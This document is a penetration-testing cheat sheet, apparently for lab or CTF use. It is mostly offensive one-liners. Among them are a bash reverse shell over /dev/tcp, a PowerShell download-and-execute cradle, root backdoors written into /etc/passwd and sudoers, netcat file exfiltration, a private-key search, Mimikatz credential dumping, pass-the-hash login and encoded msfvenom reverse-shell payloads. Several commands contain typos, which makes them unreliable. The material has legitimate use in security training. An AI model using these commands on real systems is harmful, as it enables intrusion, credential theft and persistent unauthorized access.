Quick Guide

List of Commands

NMAP

Full TCP: sudo nmap -Pn -A -p- -T4 $IP -o tcp-scan.txt

UDP: sudo nmap -sUV -F -T4 $IP -o udp-scan.txt

HTTP: sudo nmap -Pn -T4 -p 80 --script=http-enum $IP

SMB: sudo nmap -Pn -T4 --script smb-vuln* -p 139,145 $IP

SMB Enum: sudo nmap -Pn -T4 --script=smb-enum-shares.nse -p 445 $IP

Enumerate given ports: sudo nmap -sV -sV -p $PORTS $IP

Network: nmap -sn 10.10.10.1/24, 10.10.11.1-253, 10.10.12.*

SAMBA

Tool smbmap:

• smbmap -H $TARGET

Tool enum4linux:

• enum4linux -a $TARGET

Tool smbclient:

• smbclient -L $TARGET -N

• smbclient //$TARGET/$DRIVE -U guest

Tool crackmapexec:

• crackmapexec smb $TARGET -u 'guest' -p '' --rid-brute

MySQL: mysql -h $TARGET -u $USER -p $PASS

SQSH: sqsh -S $TARGET -U $USER -p "$PASS"

DIRSEARCH

python3 dirsearch.py -e txt,html,php,sh -w $WORDLIST -t 10 -u $IP

BANNERS

nc $IP $PORT

ESCAPE SHELLS

Python: python -c 'import pty;pty.spawn("/bin/bash")'

Echo: echo os.system('/bin/bash')

Bash: /bin/bash -i

ENV: SHELL=/bin/bash script -q /dev/null

REVERSE SHELLS

Bash: /bin/bash -c 'bash -i >& /dev/tcp/$IP/$PORT 0>&1'

HASHCAT

Run: sudo hashcat -m $TYPE -a 0 $HASHFILE $WORDLIST -O

Show: sudo hashcat -m $TYPE $HASHFILE --show

ROOT

Passwd: echo r00t:0Wna/pt5B0TzM:0:0:r00t:/root:/bin/bash >> /etc/passwd

Sudoers: echo "user ALL=(ALL:ALL) NOPASSWD: ALL" >> /etc/sudoers

Find:

echo "r00t:password" > /tmp/newpass.txt
sudo find . -name "." -exec useradd r00t -ou 0 -g root -s /bin/bash \;
sudo find . -name "." -exec chpasswd < /tmp/newpass.txt \;

TRANSFER & SHARE

Netcat:

• Receiver: nc -nvlp $PORT > $FILE

• Giver: nc $IP $PORT < $FILE

Python:

• Host: python -m http.client $PORT

• Client: wget http://$IP/$FILE -O $FILE

Powershell:

• Execute remote program: powershell iex(new-object net.webclient).downloadString('http://$IP:$PORT/$FILE')

• Download remote file: powershell invoke-webrequest -uri "http://$IP/$FILE" -outfile "$FILE"

Samba:

• Start sharing: sudo smbserver.py share .

• Copy: copy \\$IP\share\$FILE $FILE

LINUX QUICK

Find: find / -iname "*$PATTER*" -print 2>/dev/null

Grep: grep -iRl "$PATTERN" . 2>/dev/null

Versions:

# system distribution (os)
lsb_release -a 
cat /etc/issue
# kernal information
uname -a 
cat /proc/version

Network:

# netstat
netstat -tulip
# ps
ps aux
ps aux | grep root

Searching:

# check webpage
ls -lisa /var/www/html
# check config files
ls -lisa /etc/ | grep .conf
# find all suid programs
find /* -user root -perm -4000 -print 2>/dev/null 
# world writable directories
find / -writable -type d 2>/dev/null
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
# world writable files
find / -perm -2 -type f 2>/dev/null | grep -v "/proc*" 
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null 
# search for private keys
find / -xdev -type f -print0 | xargs -0 grep -H "BEGIN RSA PRIVATE KEY"

SUID:

# adds suid bit
chmod u+s /bin/executable
# changes path variable
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 

Ping Sweep:

# linux
for i in {1..254}; do (ping -c 10.10.10.$i | grep "bytes from" &); done
# windows
for /L %i in {1,1,255} do @ping -n 1 -w 200 10.10.10.%i > null && echo 192.168.1.%i is up.

WINDOWS QUICK

RDP: xfreerdp /u:$USER /p:$PASS /v:$HOST:$PORT /drive:$PATH /dynamic-resolution +clipboard

Upgrade Shell: system("start cmd.exe /k $SHELL")

Basic Cmds:

# hostname
hostname
# user info
echo %username%
getuid
whoami
whoami /priv
# all user info
net users
net users Administrator
# firewall
netsh firewall show state
netsh firewall show config
# scheduled tasks
schtasks /query /fo LIST /v 
# services
net start
wmic service list brief
tasklist /SVC
# versions
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# os version
type c:/windows/system32/eula.txt
# network
ipconfig /all & route print & arp -a
# connections
netstat -aton
# searching
dir /S /B $FILE
# greping
findstr /spin /c:"$PATTERN" $FILE
findstr /S /I /M /C:"$PATTERN" *.*

Exploit Suggester:

systeminfo
# take output and put into systeminfo.txt
python windows-expoit-suggester.py --database 2020-09-27-mssb.xls --systeminfo systeminfo.txt

Mimikatz:

./mimikatz.exe 
	privilege::debug
	sukurlsa::logonpasswords
evil-winrm -i $TARGET -u Administrator -H $NTLM

COMPILING C

# compiling c
gcc exploit.c -o exploit
# including pthread
gcc -pthread exploit.c -o exploit
# specific architecture (gcc-multilib)
sudo apt-get install gcc-multilib
gcc -m32 exploit.c -o exploit
gcc -m64 exploit.c -o exploit
# compiling to exe for different architecture
sudo apt-get install mingw-64
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32

MSFVENOM

Most used examples:

# windows encoded reverse tcp shell
msfvenom -p windows/shell/reverse_tcp LHOST=$IP LPORT=$PORT -e shikata_ga_nai -i 3 -f exe > shell.exe
# windows encoded meterpreter reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -e shikata_ga_nai -i 3 -f exe > encoded.exe
# war file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=$PORT -f war > shell.war
# metasploit handler
msfconsole
use exploit/multi/handler
set lhost $IP
set lport $PORT
run

The following was used for a B0F challenge:

# compiling as exe for meterpreter reverse tcp shell
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1337 -e x86/shikata_ga_nai -f exe -o exploit.exe